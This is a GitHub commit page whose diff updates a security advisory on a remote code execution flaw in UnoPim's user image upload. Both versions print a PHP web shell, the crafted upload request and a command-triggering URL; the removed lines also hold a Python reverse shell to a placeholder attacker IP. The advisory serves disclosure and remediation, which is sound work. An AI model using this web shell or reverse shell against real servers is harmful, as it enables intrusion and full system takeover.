Skip to content

Commit e420d37

Browse files
advisory-database[bot]advisory-database[bot]
committed
1 parent 8af7646 commit e420d37

1 file changed

Lines changed: 2 additions & 2 deletions

File tree

advisories/github-reviewed/2025/08/GHSA-v22v-xwh7-2vrm/GHSA-v22v-xwh7-2vrm.json

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,13 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-v22v-xwh7-2vrm",
4-
"modified": "2025-08-21T19:16:45Z",
4+
"modified": "2026-05-28T18:04:24Z",
55
"published": "2025-08-21T14:26:31Z",
66
"aliases": [
77
"CVE-2025-55743"
88
],
99
"summary": "UnoPim vulnerable to remote code execution through Arbitrary File upload",
10-
"details": "### Summary:\nAffected Functionality: **Image upload at User creation**\nEndpoint: `/admin/settings/users/create`\n\n### Details\nThe image upload at the user creation feature performs only client side file type validation.\nA user can capture the request by uploading an image, capture the request through a Proxy like Burp suite. \nMake changes to the file extension and content. The .php file when accessed through the link runs the code we provided inside the file.\n\nModified part of the multipart request body:\n```\nContent-Disposition: form-data; name=\"image[]\"; filename=\"poc.php\"\nContent-Type: application/x-php\n\n<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>\n```\n\n### PoC\n 1. Upload an image file as profile picture during user creation , now capture the request and modify.\n File content: ```<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>```\n File name: poc.php\n Content-Type can be any, doesn't matter. \n 2. Access the uploaded file e.g. http://localhost:8000/storage/admins/21/poc.php?cmd=ls\n // pass the command to run as parameter value for `cmd`, example running `ls` command on the system\n\nLikewise the following reverse shell code ( [reverse shell of other languages](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) ) can be executed to create a connection to attacker controlled system\nCommand:\n```\npython3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_IP\",7000));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(\"sh\")%27\n```\n// Make sure `netcat` is running on port `7000`\n// change `IP` accordingly\n\n### Impact\nEvery user in the dashboard is allowed to change their profile picture, thus allowing any of these users to execute malicious actions at the Server level. Usually a server might host multiple applications, allowing execution of system commands allows complete control of the system. The impact of an RCE vulnerability can be full system compromise, access to database and filesystem, access other sensitive devices on the network.\nPlease see the POC video: https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn\n\n\n### Recommendation:\nExtension Validation: Whitelist allowed extensions. ( use `endswith()` check rather than `contains()` as an attacker can bypass such a restriction with filename: poc.jpg.php",
10+
"details": "### Summary:\nAffected Functionality: **Image upload at User creation**\nEndpoint: `/admin/settings/users/create`\n\n### Details\nThe image upload at the user creation feature performs only client side file type validation.\nA user can capture the request by uploading an image, capture the request through a Proxy like Burp suite. \nMake changes to the file extension and content. The .php file when accessed through the link runs the code we provided inside the file.\n\nModified part of the multipart request body:\n```\nContent-Disposition: form-data; name=\"image[]\"; filename=\"poc.php\"\nContent-Type: application/x-php\n\n<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>\n```\n\n### PoC\n 1. Upload an image file as profile picture during user creation , now capture the request and modify.\n File content: ```<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>```\n File name: poc.php\n Content-Type can be any, doesn't matter. \n 2. Access the uploaded file e.g. http://localhost:8000/storage/admins/21/poc.php?cmd=ls\n // pass the command to run as parameter value for `cmd`, example running `ls` command on the system\n\nLikewise a reverse shell code ( [reverse shell of other languages](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) ) can be executed to create a connection to attacker controlled system.\n\n### Impact\nEvery user in the dashboard is allowed to change their profile picture, thus allowing any of these users to execute malicious actions at the Server level. Usually a server might host multiple applications, allowing execution of system commands allows complete control of the system. The impact of an RCE vulnerability can be full system compromise, access to database and filesystem, access other sensitive devices on the network.\nPlease see the POC video: https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn\n\n\n### Recommendation:\nExtension Validation: Whitelist allowed extensions. ( use `endswith()` check rather than `contains()` as an attacker can bypass such a restriction with filename: poc.jpg.php",
1111
"severity": [
1212
{
1313
"type": "CVSS_V4",

0 commit comments

Comments
 (0)